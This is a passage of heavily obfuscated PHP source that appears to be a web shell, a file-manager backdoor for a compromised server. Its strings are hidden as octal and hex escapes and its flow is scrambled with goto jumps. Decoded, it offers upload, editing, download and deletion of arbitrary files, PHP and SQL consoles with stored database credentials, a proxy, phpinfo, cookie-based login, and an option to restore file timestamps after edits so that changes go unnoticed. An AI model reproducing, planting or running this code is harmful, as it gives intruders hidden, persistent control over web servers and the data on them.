"\155\x61\x6b\145\x5f\x64\151\162\145\x63\x74\x6f\162\x79") . "\15\xa" . OFtv4(NihJE("\123\x68\157\x77") . "\40" . NiHje("\116\x65\x77\40\x66\151\x6c\145"), "\156\145\x77\x5f\x66\151\154\x65") . "\15\xa" . oftV4(nIhJE("\123\150\157\x77") . "\x20" . NiHje("\x55\x70\x6c\x6f\x61\x64"), "\x75\160\x6c\157\x61\x64\137\x66\151\154\x65") . "\xd\12" . OFTv4(nIhjE("\x53\150\x6f\167") . "\x20\x50\110\120\x20\166\145\x72\163\x69\x6f\156", "\163\x68\157\167\x5f\160\x68\x70\137\x76\145\162") . "\xd\12" . oFTv4(NiHJE("\x53\x68\157\167") . "\x20\120\x48\x50\40\151\156\x69", "\x73\x68\157\x77\137\160\x68\x70\137\151\x6e\x69") . "\xd\xa" . OFTV4(NiHJe("\x53\x68\157\167") . "\40" . NiHJE("\x47\145\x6e\x65\162\141\164\151\x6f\156\40\x74\x69\x6d\145"), "\163\150\x6f\167\x5f\x67\x74") . "\xd\xa" . OftV4(nIhje("\x53\150\x6f\x77") . "\40\x78\154\163", "\163\150\157\x77\137\170\x6c\x73") . "\xd\xa" . OFTv4(nihjE("\x53\150\x6f\x77") . "\40\120\110\120\x20" . nIHjE("\103\157\x6e\x73\x6f\154\x65"), "\145\156\141\142\154\x65\x5f\160\150\160\137\143\157\x6e\x73\157\x6c\145") . "\15\xa" . ofTV4(nIhje("\x53\x68\157\167") . "\x20\x53\121\x4c\x20" . Nihje("\103\157\x6e\163\x6f\154\145"), "\145\156\x61\142\x6c\145\137\x73\161\154\x5f\x63\157\x6e\163\x6f\154\145") . "\15\xa\x3c\164\x72\76\x3c\x74\144\40\x63\154\141\163\x73\75\x22\162\157\167\x31\42\x3e\74\151\156\160\x75\164\x20\x6e\141\x6d\x65\x3d\x22\x66\x6d\x5f\143\157\156\x66\151\147\x5b\163\161\x6c\x5f\163\x65\162\166\145\x72\135\x22\40\x76\141\154\x75\x65\x3d\42" . $dVmsi["\163\161\x6c\137\x73\x65\162\x76\145\162"] . "\x22\x20\164\x79\x70\x65\x3d\42\x74\145\x78\164\x22\x3e\74\x2f\x74\144\x3e\74\x74\x64\x20\143\154\x61\163\x73\75\42\x72\x6f\x77\x32\40\167\x68\157\x6c\x65\x22\76\x53\x51\114\x20\163\x65\162\x76\145\162\74\x2f\x74\x64\x3e\x3c\x2f\164\x72\76\15\12\74\164\162\76\74\x74\x64\x20\143\x6c\x61\163\x73\75\42\162\x6f\167\61\42\x3e\74\151\x6e\x70\x75\164\x20\156\x61\x6d\x65\75\x22\146\155\x5f\x63\157\156\146\151\x67\x5b\x73\161\154\x5f\x75\x73\145\x72\156\141\x6d\145\135\42\40\x76\x61\x6c\165\x65\x3d\x22" . $dVmsi["\x73\x71\154\x5f\165\163\145\162\156\141\155\x65"] . "\x22\40\164\x79\160\x65\x3d\x22\164\145\170\x74\42\x3e\74\57\x74\144\x3e\74\164\x64\x20\x63\x6c\141\163\163\x3d\x22\162\157\167\x32\40\x77\150\x6f\154\145\x22\76\123\121\114\x20\x75\163\145\162\x3c\x2f\164\144\76\x3c\57\164\x72\76\xd\xa\74\x74\x72\x3e\74\164\144\40\x63\154\x61\163\163\x3d\42\162\x6f\167\x31\42\76\x3c\x69\156\x70\165\x74\x20\156\x61\155\x65\x3d\42\x66\x6d\137\x63\x6f\x6e\146\151\x67\133\x73\x71\154\137\x70\141\163\163\x77\157\162\144\x5d\42\40\x76\x61\154\165\x65\x3d\42" . $dVmsi["\x73\x71\154\x5f\160\x61\163\x73\x77\x6f\162\x64"] . "\42\40\164\x79\160\x65\75\x22\164\145\x78\164\x22\x3e\x3c\x2f\x74\144\76\x3c\x74\144\40\143\154\x61\163\x73\75\42\162\x6f\167\x32\40\167\x68\x6f\154\145\42\76\123\121\114\x20\160\x61\163\x73\x77\x6f\162\x64\74\x2f\164\144\x3e\74\57\x74\x72\76\15\xa\74\x74\x72\76\x3c\x74\x64\x20\x63\154\x61\x73\x73\75\42\162\157\167\61\42\76\x3c\151\x6e\160\165\164\x20\156\141\155\x65\x3d\42\146\x6d\137\x63\157\x6e\x66\x69\147\x5b\163\x71\154\137\144\x62\135\x22\40\166\141\154\x75\145\x3d\x22" . $dVmsi["\x73\161\x6c\137\x64\142"] . "\x22\x20\164\x79\160\x65\x3d\42\164\145\x78\164\x22\76\x3c\57\164\144\76\x3c\x74\144\40\143\154\x61\163\x73\75\x22\x72\x6f\167\62\40\167\150\157\154\x65\x22\76\123\121\114\40\104\102\74\57\x74\x64\76\74\57\164\x72\76\15\xa" . OFtV4(NIhjE("\123\150\157\167") . "\40\120\162\157\x78\171", "\145\156\x61\x62\x6c\145\137\x70\x72\x6f\x78\x79") . "\15\12" . Oftv4(nIHJE("\x53\150\157\167") . "\x20\160\x68\x70\151\x6e\146\157\50\51", "\163\x68\157\x77\x5f\x70\x68\x70\x69\156\x66\x6f") . "\xd\xa" . ofTv4(NiHJE("\123\x68\157\167") . "\x20" . NiHje("\x53\145\164\x74\151\156\x67\163"), "\146\x6d\x5f\163\145\x74\164\151\156\x67\163") . "\xd\xa" . OfTV4(nihJe("\122\145\163\164\x6f\162\145\x20\x66\151\x6c\x65\40\x74\151\x6d\145\40\x61\x66\164\145\x72\x20\145\144\151\164\x69\156\147"), "\x72\x65\x73\164\157\x72\145\x5f\164\x69\x6d\145") . "\xd\12" . ofTv4(NIhJe("\x46\151\x6c\145\40\155\141\156\141\x67\145\x72") . "\x3a\x20" . NIhjE("\122\145\163\x74\x6f\162\145\40\x66\x69\154\x65\x20\164\151\x6d\145\40\141\x66\x74\145\162\x20\x65\144\151\x74\x69\x6e\x67"), "\x66\155\137\162\x65\163\x74\x6f\x72\145\137\x74\x69\155\x65") . "\xd\xa\x3c\x74\x72\76\x3c\x74\x64\x20\x63\154\x61\163\163\75\x22\162\157\167\x33\42\76\74\141\40\x68\162\145\x66\x3d\x22" . m576d() . "\77\x66\x6d\137\x73\145\x74\x74\x69\156\x67\163\75\164\162\x75\145\46\146\x6d\137\143\x6f\x6e\x66\x69\147\x5f\x64\145\x6c\x65\164\x65\75\164\162\165\145\42\76" . niHJE("\x52\145\163\145\164\x20\x73\x65\164\164\151\x6e\x67\x73") . "\74\57\x61\x3e\74\57\x74\x64\x3e\x3c\164\x64\40\143\154\141\x73\x73\75\x22\162\x6f\x77\63\x22\x3e\x3c\151\x6e\x70\165\164\40\164\171\x70\x65\x3d\x22\163\165\x62\x6d\151\164\42\40\x76\141\x6c\x75\x65\75\x22" . NiHJe("\123\x61\166\x65") . "\42\40\156\x61\x6d\x65\x3d\42\x66\155\x5f\x63\157\x6e\146\151\x67\133\x66\x6d\x5f\163\x65\164\137\163\x75\x62\x6d\x69\164\135\x22\x3e\x3c\57\x74\x64\76\x3c\57\x74\162\x3e\15\xa\74\57\x66\157\x72\x6d\76\15\12\74\57\x74\x61\142\x6c\145\76\15\12\74\164\x61\x62\154\145\76\15\12\74\146\x6f\162\155\40\x6d\x65\164\150\157\144\x3d\42\160\157\163\164\x22\x20\141\x63\x74\x69\157\x6e\x3d\42\x22\x3e\15\xa\x3c\x74\162\76\x3c\x74\x68\x20\x63\x6f\154\163\160\141\156\75\42\x32\42\76" . NIhJe("\123\x65\164\164\x69\156\147\x73") . "\40\55\x20" . nIhJE("\101\165\x74\150\x6f\162\x69\x7a\x61\164\151\157\156") . "\x3c\x2f\x74\150\76\x3c\x2f\x74\x72\76\15\xa\74\x74\x72\x3e\x3c\x74\144\40\143\x6c\141\x73\163\75\42\x72\157\x77\61\42\x3e\x3c\151\156\160\x75\x74\x20\x6e\x61\155\x65\75\42\146\155\x5f\x6c\157\x67\151\x6e\133\141\x75\164\x68\x6f\162\151\x7a\x65\x5d\x22\40\x76\141\x6c\165\145\75\x22\x31\42\x20" . ($OS8TV["\x61\165\x74\150\157\x72\x69\x7a\145"] ? "\x63\x68\x65\143\153\145\x64" : '') . "\x20\x74\x79\160\x65\x3d\42\x63\x68\145\x63\153\x62\157\170\42\40\x69\x64\x3d\42\x61\x75\164\150\x22\76\x3c\x2f\x74\144\76\x3c\164\x64\40\143\154\141\163\x73\x3d\x22\162\x6f\x77\x32\x20\167\150\x6f\x6c\145\x22\76\74\154\141\x62\145\154\40\x66\x6f\162\75\x22\141\x75\164\x68\42\x3e" . nIhjE("\x41\165\164\150\x6f\x72\x69\172\x61\164\x69\157\x6e") . "\x3c\x2f\154\141\142\145\x6c\x3e\74\57\164\x64\76\x3c\x2f\x74\x72\76\xd\12\74\x74\x72\x3e\74\164\144\40\x63\154\x61\163\163\75\x22\162\157\x77\x31\42\x3e\74\x69\x6e\x70\165\164\40\156\x61\x6d\145\75\42\146\155\x5f\x6c\x6f\147\x69\x6e\133\x6c\157\147\x69\156\x5d\x22\x20\166\x61\x6c\x75\x65\75\x22" . $OS8TV["\x6c\x6f\x67\x69\x6e"] . "\x22\x20\x74\x79\160\x65\x3d\x22\164\x65\170\164\x22\76\x3c\x2f\x74\x64\x3e\74\x74\x64\x20\x63\x6c\141\x73\163\x3d\x22\x72\x6f\167\x32\40\167\150\157\x6c\x65\x22\x3e" . niHje("\x4c\157\x67\151\x6e") . "\74\x2f\164\x64\x3e\x3c\x2f\164\x72\76\xd\12\74\x74\162\76\74\x74\144\x20\143\154\141\163\163\x3d\42\162\x6f\x77\61\42\76\74\x69\156\x70\x75\x74\x20\x6e\141\155\x65\75\x22\146\155\137\154\157\x67\151\x6e\x5b\x70\x61\163\163\167\x6f\x72\144\x5d\x22\x20\166\141\154\165\x65\x3d\x22" . $OS8TV["\160\141\163\163\167\x6f\x72\x64"] . "\x22\40\x74\x79\160\x65\75\42\164\145\x78\x74\x22\x3e\74\57\164\x64\x3e\x3c\164\144\40\143\x6c\x61\163\x73\x3d\42\162\157\167\62\x20\167\150\x6f\154\145\x22\x3e" . NIHJe("\120\x61\163\x73\167\x6f\x72\144") . "\74\57\x74\x64\76\x3c\57\x74\162\76\15\xa\74\x74\162\x3e\x3c\x74\x64\40\143\154\141\x73\x73\75\x22\162\157\x77\x31\x22\76\x3c\x69\156\160\165\164\x20\x6e\141\155\x65\75\42\x66\155\x5f\154\x6f\147\x69\156\x5b\143\x6f\157\153\151\x65\x5f\x6e\141\x6d\x65\135\x22\x20\166\x61\154\x75\145\75\x22" . $OS8TV["\143\x6f\x6f\x6b\151\x65\137\156\141\155\x65"] . "\x22\40\164\x79\160\145\75\42\164\x65\x78\x74\x22\x3e\74\57\x74\x64\76\x3c\x74\144\x20\x63\x6c\141\163\x73\75\x22\x72\x6f\167\62\x20\x77\x68\157\x6c\x65\42\76" . NIHJE("\x43\x6f\157\153\151\x65") . "\x3c\57\x74\x64\x3e\74\57\x74\162\76\xd\12\74\x74\x72\x3e\74\x74\144\x20\x63\154\141\163\163\x3d\x22\162\157\x77\61\42\x3e\74\x69\x6e\160\x75\164\x20\x6e\141\x6d\x65\x3d\42\146\155\x5f\x6c\x6f\x67\x69\x6e\x5b\x64\141\171\163\x5f\x61\x75\164\150\x6f\x72\151\172\x61\164\151\157\156\x5d\42\40\x76\141\154\x75\x65\x3d\42" . $OS8TV["\144\141\171\x73\137\x61\165\164\150\x6f\x72\x69\x7a\x61\164\x69\x6f\156"] . "\42\40\x74\171\160\x65\75\42\x74\x65\170\x74\x22\x3e\74\57\164\144\x3e\74\164\144\40\143\x6c\x61\x73\163\x3d\x22\x72\x6f\167\x32\40\x77\150\x6f\154\x65\x22\x3e" . niHJe("\104\141\x79\163") . "\74\57\164\144\x3e\74\x2f\164\x72\x3e\xd\12\74\164\162\76\74\x74\144\x20\143\x6c\x61\x73\x73\x3d\42\162\157\x77\x31\42\x3e\74\x74\145\170\x74\141\162\145\141\40\x6e\x61\x6d\145\75\x22\146\155\137\154\157\147\x69\156\x5b\163\143\162\151\x70\x74\x5d\x22\x20\x63\x6f\x6c\x73\75\42\x33\65\x22\40\162\x6f\x77\163\x3d\x22\x37\42\40\x63\x6c\141\x73\x73\75\42\x74\145\170\164\141\x72\145\x61\137\151\x6e\x70\165\164\42\x20\x69\x64\75\42\x61\165\164\x68\x5f\163\x63\162\151\x70\164\x22\76" . $OS8TV["\x73\x63\162\x69\x70\164"] . "\74\57\x74\x65\170\164\141\x72\145\141\x3e\x3c\x2f\x74\144\x3e\x3c\164\x64\x20\143\154\x61\x73\x73\75\42\162\157\x77\x32\40\167\x68\x6f\154\145\42\76" . nIHjE("\x53\x63\x72\151\x70\164") . "\74\x2f\164\144\x3e\x3c\x2f\164\162\76\15\xa\74\164\162\x3e\x3c\x74\144\40\143\x6f\x6c\163\160\141\156\x3d\x22\x32\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\162\x6f\167\x33\x22\76\74\x69\156\160\x75\164\40\x74\x79\160\x65\75\x22\x73\x75\142\155\x69\164\x22\x20\166\x61\x6c\165\x65\75\x22" . nIhJE("\x53\141\166\145") . "\42\x20\76\74\x2f\164\x64\76\74\57\x74\x72\x3e\xd\xa\x3c\x2f\x66\x6f\x72\155\76\xd\xa\74\x2f\x74\x61\142\x6c\145\x3e"; goto NGHPs; C2lbT: KBSl8: goto rWfnB; yJIAK: $DGyLr = implode("\56", $vJe3R); goto i52RP; Ft3jK: foreach ($lXLSC as $nQMGz) { goto fL0ra; dpYvf: I3DQH: goto O3oUA; w8HZA: $aeudG = $aeudG[0]; goto yFDcE; VEYBA: W5NUs: goto dpYvf; yFDcE: if (!in_array($aeudG, $LUt9m)) { goto W5NUs; } goto oL96S; oL96S: $q2HJ9 = $aeudG; goto VEYBA; fL0ra: $aeudG = explode("\x3b", $nQMGz); goto w8HZA; O3oUA: } goto zqFfH; Tf5_D: goto gJWGb; goto p_20H; zVc7y: echo "\11\x9\11\74\x2f\x74\144\x3e\xd\xa\11\11\11\x3c\x2f\x74\162\x3e\xd\12\11\11\x3c\x2f\164\141\x62\x6c\x65\x3e\15\12\x20\x20\x20\x20\x3c\57\x74\x64\x3e\xd\xa\x20\x20\40\40\x3c\x74\144\x20\x63\154\141\x73\163\75\x22\162\x6f\167\x33\x22\x3e\xd\xa\x9\11\74\164\x61\142\154\x65\x3e\xd\xa\x9\11\74\164\162\76\15\12\11\11\x3c\164\x64\76\xd\xa\x9\x9"; goto xe20E; JKdML: goto g28WX; goto jqGa_; GrFLG: $VX_H6 = $BXCqO . "\137\x74\x65\155\160\154\141\164\145\163"; goto eyX03; NgiUf: $JD5XC = isset($_GET["\165\x72\x6c"]) ? urldecode($_GET["\x75\162\x6c"]) : ''; goto YlYtd; slE1x: IWckz: goto LFeKD; b3n7a: set_time_limit(0); goto z8XCN; j4DZc: function nihje($x2pxM) { goto s3UGA; mvAEM: goto P8JSt; goto eBfZn; s3UGA: global $BzzRQ; goto f6Pt6; uGuOP: return $BzzRQ[$x2pxM]; goto fycDQ; eBfZn: BotSo: goto uGuOP; f6Pt6: if (isset($BzzRQ[$x2pxM])) { goto BotSo; } goto z133a; fycDQ: P8JSt: goto NdvOo; z133a: return $x2pxM; goto mvAEM; NdvOo: } goto gt1KO; ymI9q: function kVQJw($Qhr2z, $hyE1t, $mQ10E = '') { goto B8WWJ; iJw2K: return $kmPKX; goto XP5Tk; JoS59: kGSgZ: goto iJw2K; B8WWJ: foreach ($Qhr2z as $rlr41) { goto T2cjh; T2cjh: $zxL6n = $rlr41[$hyE1t]; goto m0Cf3; m0Cf3: $kmPKX .= "\74\157\160\164\151\157\x6e\x20\x76\x61\154\x75\x65\75\x22" . $zxL6n . "\x22\x20" . ($mQ10E && $mQ10E == $zxL6n ? "\163\145\x6c\145\143\x74\145\x64" : '') . "\x3e" . $zxL6n . "\74\57\157\160\x74\151\x6f\156\x3e"; goto s2LBD; s2LBD: yDTpM: goto bykVS; bykVS: } goto JoS59; XP5Tk: } goto laYbd; Kk3Gi: $jXlJq = @file_get_contents($QxlDp . $_REQUEST["\x65\144\151\x74"]); goto Dcrc_; mx6YM: if (!empty($_POST[$h17u3 . "\x5f\156\141\155\145"])) { goto JWxzC; } goto vb9j_; BC5CQ: bHPnA: goto PRN3e; IVUD5: goto mnuak; goto q725k; OIbSe: echo "\x22\x3e\xd\12\40\40\x20\40\40\40\x20\40\74\57\x66\157\162\155\76\15\12\40\40\40\x20\74\57\x74\x64\76\xd\xa\74\x2f\x74\x72\76\15\12\x3c\x2f\x74\x61\x62\154\145\x3e\15\12"; goto S7xKs; LOqcd: echo "\74\x2f\150\62\76\74\57\164\x64\x3e\x3c\x74\x64\76" . gmdhs("\163\x71\x6c"); goto HKXwG; U5_Yk: echo "\x3c\164\141\142\154\x65\40\142\157\x72\144\x65\162\x3d\x27\60\47\40\143\x65\154\x6c\x73\x70\141\143\x69\156\x67\75\47\x30\x27\x20\143\x65\x6c\x6c\160\141\144\x64\x69\156\147\x3d\47\61\x27\x20\x77\x69\x64\x74\x68\x3d\42\61\60\60\x25\42\76\xd\xa\74\164\162\x3e\xd\12\x20\40\x20\40\x3c\164\150\x3e"; goto T8d1u; p_3i1: setcookie("\x66\155\137\143\157\156\146\x69\x67", serialize($dVmsi), time() + 86400 * $OS8TV["\x64\x61\171\x73\x5f\141\x75\x74\x68\x6f\x72\151\172\x61\x74\151\157\156"]); goto kGK8F; QyVST: Lp30c: goto R2_V0; DLBKI: if (!isset($_GET["\x70\150\x70\x69\x6e\146\x6f"])) { goto Vgi3Q; } goto x3zaw; puZVe: if (empty($_FILES["\165\x70\154\x6f\141\x64"]["\x6e\141\x6d\x65"])) { goto hxE4y; } goto umdRD; Mjc6k: set_time_limit(0); goto G9oNU; vaFhm: VCm2t: goto vdTIr; ZOleW: z3tq0: goto dt1sB; IH5qZ: unlink($JV9b8); goto qezJu; vdTIr: if (empty($dVmsi["\145\156\x61\x62\154\x65\137\x70\162\x6f\170\x79"])) { goto tFCOa; } goto ixKES; JKtLh: if (isset($BXCqO)) { goto TxKkw; } goto Rgshl; GGyoL: setcookie("\x66\x6d\x5f\143\x6f\156\x66\151\x67", '', time() - 86400 * $OS8TV["\x64\x61\x79\x73\x5f\141\x75\164\150\x6f\162\x69\x7a\x61\164\151\157\x6e"]); goto UM9S6; ndnwY: if (!$OS8TV["\x61\165\x74\x68\x6f\162\151\172\145"]) { goto KBSl8; } goto kdniH; QXDvp: echo "\11\11\11\x9\x3c\146\157\162\155\40\x6d\x65\x74\x68\x6f\x64\x3d\x22\x70\157\x73\x74\42\40\x61\x63\x74\x69\x6f\156\x3d\x22"; goto GAfob; gRZeD: function iWvTF() { goto U22Jf; hJ2JM: return "\150\x74\x74\x70\72\x2f\x2f"; goto BlKBo; YITd0: rHiim: goto DTYDz; YOdrr: return "\150\164\x74\160\x73\72\x2f\x2f"; goto u1_36; xV8Hk: j7dGg: goto zeAnQ; cRA3m: iDX9f: goto hVDvg; PaZam: return "\x68\x74\164\160\x73\x3a\x2f\57"; goto xV8Hk; hVDvg: if (!(isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\110\x54\124\120\x53"] == "\157\x6e")) { goto rHiim; } goto i5xdM; U22Jf: if (!isset($_SERVER["\110\124\124\x50\137\123\103\x48\x45\x4d\x45"])) { goto iDX9f; } goto pH5S7; i5xdM: return "\x68\x74\164\160\x73\72\x2f\x2f"; goto YITd0; DTYDz: if (!(isset($_SERVER["\123\x45\x52\126\105\122\x5f\120\x4f\122\124"]) && $_SERVER["\123\x45\122\x56\105\x52\137\x50\117\x52\124"] == 443)) { goto j7dGg; } goto PaZam; u1_36: qHNNd: goto hJ2JM; zeAnQ: if (!(isset($_SERVER["\110\x54\124\x50\x5f\130\x5f\106\117\x52\127\101\x52\x44\x45\x44\x5f\120\x52\x4f\x54\117"]) && $_SERVER["\110\x54\124\120\x5f\130\137\106\117\122\x57\101\x52\x44\x45\104\137\x50\x52\x4f\124\117"] == "\x68\x74\x74\160\x73")) { goto qHNNd; } goto YOdrr; pH5S7: return $_SERVER["\x48\x54\124\x50\137\123\x43\110\105\x4d\105"] . "\72\x2f\57"; goto cRA3m; BlKBo: } goto siQCk; UFp4I: nW1c4: goto SXX2d; R9as5: echo "\42\76"; goto h1BOx; jiBb0: Flpsu: goto N3PaM; igxwz: $PhGcO .= niHje("\x43\162\x65\x61\164\145\144") . "\x20" . $_REQUEST["\146\x69\154\145\x6e\141\x6d\x65"]; goto Tf5_D; zQRAh: if (isset($kvz02)) { goto PEToN; } goto JKtLh; AXNvt: $xT4Au = $Dr8Zp[0] + $Dr8Zp[1] - $g21yr; goto iW20Z; Ooizh: function FiGn2($ymjik) { return "\x2e\x2f" . basename(__FILE__) . "\77\x69\x6d\x67\75" . base64_encode($ymjik); } goto zQFgJ; vg9_B: OKLOV: goto CIDgJ; DBMJr: echo "\x22\x3e\15\xa\11\x9\x9\x9\x3c\57\x66\157\162\x6d\76\15\xa\11\x9\11"; goto BC5CQ; BqGhH: function E9n9K($XFAAc) { goto s5waG; OCybJ: header("\x43\157\x6e\164\x65\156\x74\x2d\124\171\x70\145\72\40\x61\160\160\x6c\x69\143\141\164\151\x6f\x6e\x2f\x64\157\x77\x6e\x6c\157\141\x64"); goto qCEH8; f4JUO: die; goto U4WHt; e4d9Y: header("\x43\x6f\156\164\145\x6e\x74\x2d\x44\151\163\160\x6f\x73\151\164\x69\157\156\72\40\141\164\164\141\143\150\155\x65\156\x74\x3b\40\x66\x69\154\145\x6e\x61\x6d\x65\75" . basename($XFAAc)); goto ZkYC8; P7mf6: if (feof($pMorP)) { goto TudN3; } goto GRu1k; yYgd7: TudN3: goto NEk8r; NEk8r: fclose($pMorP); goto f4JUO; ZkYC8: header("\103\157\156\164\145\156\164\55\x54\171\x70\145\72\x20\x61\160\x70\154\x69\x63\141\164\x69\157\x6e\x2f\146\157\162\143\x65\55\144\157\x77\156\154\157\141\144"); goto j3NMF; oMVhb: if (file_exists($XFAAc)) { goto rQrmI; } goto fgaQO; U4WHt: aFZO9: goto oNQEU; yiat0: header("\103\x6f\156\x74\x65\x6e\x74\55\x4c\x65\156\147\x74\x68\72\40" . filesize($XFAAc)); goto OORgJ; s5waG: if (empty($XFAAc)) { goto fXR4w; } goto oMVhb; t2SHY: die; goto Qv5zZ; j3NMF: header("\103\157\156\164\145\x6e\x74\55\x54\x79\x70\145\72\40\x61\160\x70\x6c\x69\143\141\164\x69\157\156\x2f\x6f\x63\164\145\x74\55\x73\x74\162\145\x61\x6d"); goto OCybJ; QLkFk: rQrmI: goto e4d9Y; pwVIS: header("\x53\164\x61\164\x75\163\72\x20\x34\x30\64\40\116\157\164\x20\x46\157\165\156\x64"); goto t2SHY; v5cKp: flush(); goto AO38u; oNQEU: fXR4w: goto jZ5js; OORgJ: flush(); goto j3T2g; qK9vF: e_3St: goto P7mf6; j3T2g: $pMorP = fopen($XFAAc, "\x72"); goto qK9vF; fgaQO: header("\110\x54\x54\120\x2f\x31\x2e\60\40\64\60\64\40\116\x6f\x74\x20\106\157\165\156\x64", true, 404); goto pwVIS; GRu1k: echo fread($pMorP, 65536); goto v5cKp; Qv5zZ: goto aFZO9; goto QLkFk; qCEH8: header("\x43\157\x6e\x74\145\156\164\55\x44\145\x73\x63\162\x69\x70\x74\x69\x6f\x6e\72\x20\x46\x69\x6c\x65\x20\124\x72\x61\156\163\x66\145\162"); goto yiat0; AO38u: goto e_3St; goto yYgd7; jZ5js: } goto P48Ov; qSDMH: if (!$JD5XC) { goto OpJyh; } goto lArhM; v5bL0: echo "\11\x9\11\x3c\x66\x6f\x72\x6d\40\156\141\155\x65\75\42\146\157\162\x6d\61\42\x20\x6d\145\x74\150\x6f\144\x3d\x22\160\x6f\x73\164\42\x20\x61\143\x74\151\x6f\156\x3d\x22"; goto FU_m1; NDs5p: l5IQJ: goto QqG25; coRMj: $uR23x = base64_decode($_GET["\147\172"]); goto M2LML; O2e9x: if (!empty($_REQUEST["\x6d\153\x66\151\154\x65"]) && !empty($dVmsi["\156\145\167\x5f\x66\x69\x6c\x65"])) { goto SCPBl; } goto OOgcG; vzptb: $PhGcO .= NiHJE("\x54\141\163\x6b") . "\x20\42" . nihJE("\x41\x72\x63\x68\x69\x76\x69\x6e\147") . "\40" . $M3kdW . "\42\40" . NIhJe("\144\157\156\145") . "\56\46\x6e\x62\163\x70\73" . mimd1("\144\157\x77\156\154\157\141\x64", $QxlDp . $M3kdW, nihjE("\104\x6f\x77\156\154\157\141\x64"), nIhJE("\x44\157\167\156\x6c\x6f\x61\x64") . "\40" . $M3kdW) . "\x26\x6e\142\x73\160\73\74\141\x20\150\x72\x65\x66\75\42" . $zBDAR . "\x26\144\x65\x6c\145\164\145\x3d" . $M3kdW . "\46\160\141\x74\x68\x3d" . $QxlDp . "\x22\x20\x74\x69\164\x6c\x65\75\x22" . nihjE("\x44\145\154\x65\164\x65") . "\40" . $M3kdW . "\x22\x20\x3e" . NihJE("\104\x65\154\145\x74\145") . "\x3c\x2f\x61\76"; goto v3wS6; guOT8: unlink($JV9b8); goto Mbjh8; DVnTA: setcookie($OS8TV["\x63\x6f\x6f\153\x69\x65\137\156\141\x6d\145"], $OS8TV["\154\x6f\x67\x69\x6e"] . "\x7c" . md5($OS8TV["\160\x61\x73\163\x77\x6f\162\144"]), time() + 86400 * $OS8TV["\144\x61\x79\163\137\141\165\164\150\157\162\151\172\x61\x74\x69\157\x6e"]); goto QRqi6; LFeKD: lPZkb: goto JKdML; R2_V0: if (!isset($_GET["\x66\155\x5f\163\145\x74\164\151\156\147\x73"])) { goto ez0ny; } goto xipPw; ghcFC: Rg7MM: goto Yp1MR; nqDxs: if (!($pMorP = @fopen($QxlDp . $_REQUEST["\x66\x69\154\x65\156\x61\x6d\x65"], "\167"))) { goto KwR5G; } goto SbZNe; SiZdt: if (!empty($_POST["\x66\155\x5f\154\157\147\x69\x6e"]["\x61\165\x74\x68\x6f\x72\151\172\145"])) { goto uJGnN; } goto Co_uA; YWXgq: echo niHje("\123\x75\142\x6d\x69\x74"); goto wBuLI; i52RP: MaYq0: goto irfSf; oLRhn: $PhGcO = ''; goto P7dvH; ZWtmT: if (empty($dVmsi["\x73\150\x6f\167\137\x70\150\x70\x69\x6e\146\x6f"])) { goto R_Ey7; } goto TiJ4q; LrzVY: echo "\x22\76\15\12\x20\40\x20\x20\x20\x20\40\40\x3c\57\146\x6f\x72\155\x3e\xd\xa\x20\x20\40\40\x3c\x2f\x74\x64\x3e\xd\12\74\57\x74\162\76\xd\xa\74\57\164\141\142\154\x65\76\xd\12"; goto uW7UQ; GPuDq: JotQV: goto XpCP1; Rayat: echo "\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\74\x69\x6e\x70\165\x74\40\164\x79\x70\145\x3d\x22\143\x68\145\143\153\x62\157\x78\x22\x20\x6e\141\155\145\75\42\x72\x65\x63\165\162\163\x69\x76\x65\x6c\171\42\x20\x76\141\154\165\x65\x3d\x22\x31\x22\76\40"; goto lJPxF; Oi2nt: $lXLSC = explode("\x2c", $_SERVER["\110\x54\124\120\137\x41\x43\103\105\120\124\x5f\x4c\x41\x4e\x47\125\x41\x47\105"]); goto YAsDc; vIznk: goto cLGSb; goto gStb9; UM9S6: header("\x4c\157\x63\141\x74\151\x6f\x6e\72\x20" . m576D() . "\x3f\x66\155\137\163\x65\164\164\x69\156\x67\x73\75\x74\x72\x75\x65"); goto zFwbk; gqeKE: tFCOa: goto ZWtmT; q9BrB: function OFtV4($YBL3C, $WEDKg) { global $dVmsi; return "\74\164\x72\x3e\74\164\144\40\143\154\x61\163\x73\75\42\162\x6f\167\x31\x22\76\x3c\151\156\x70\165\164\x20\151\144\75\42\146\155\x5f\143\157\x6e\146\x69\147\137" . $WEDKg . "\x22\x20\x6e\141\x6d\x65\x3d\42\x66\x6d\137\143\x6f\x6e\146\151\x67\133" . $WEDKg . "\135\42\40\166\x61\154\x75\145\75\x22\x31\42\40" . (empty($dVmsi[$WEDKg]) ? '' : "\143\x68\x65\x63\x6b\145\x64\75\x22\164\x72\x75\x65\42") . "\40\164\171\x70\x65\x3d\42\143\x68\145\143\153\x62\x6f\x78\x22\x3e\x3c\x2f\x74\144\76\74\164\x64\40\143\x6c\x61\x73\x73\x3d\42\x72\157\167\x32\x20\x77\150\x6f\x6c\x65\x22\x3e\74\154\141\x62\x65\x6c\40\x66\x6f\162\x3d\x22\146\x6d\137\x63\x6f\x6e\x66\x69\x67\137" . $WEDKg . "\42\76" . $YBL3C . "\x3c\x2f\164\x64\76\x3c\57\x74\x72\x3e"; } goto gRZeD; L5djQ: LFM0w: goto HqA11; aquSQ: if (!isset($vJe3R[1])) { goto MaYq0; } goto cmOFu; X7rAG: echo $ag5LK; goto qYSem; FZL_z: goto LLZuC; goto gokre; uE6OC: function MPfNy($JfK9U) { goto WAS0_; sjHbF: if (substr($VEMW5, 0, 1) == "\x2f") { goto Wgrc1; } goto rxBoS; rxBoS: if (substr($VEMW5, 0, 2) == "\x2e\57") { goto Sh372; } goto D_SWK; b25xB: aGvA0: goto lQIek; xCSkl: $VEMW5 = $Mbf3m . $VEMW5; goto mWrBy; KjATT: return $JfK9U[1] . "\75\42" . $VEMW5 . "\42"; goto CKQxv; i8uh8: mEZNF: goto KjATT; kaVX0: $VEMW5 = substr_replace($VEMW5, $Mbf3m, 0, 1); goto f8EhG; UOyMe: $dDGCD = $mHt_S . "\x3f\160\x72\x6f\x78\171\75\164\x72\165\145\46\165\x72\154\x3d"; goto g7Ah4; u96xf: goto aSuKP; goto b25xB; w1D8i: $VEMW5 = substr_replace($VEMW5, $Mbf3m, 0, 2); goto Tu2K_; Rledr: aSuKP: goto YaXeo; xFeZp: SW8s2: goto TytGt; D_SWK: if (substr($VEMW5, 0, 4) == "\x68\x74\164\160") { goto WAiyb; } goto xCSkl; EyizD: $mHt_S = KiMPw() . "\57" . basename(__FILE__); goto UOyMe; 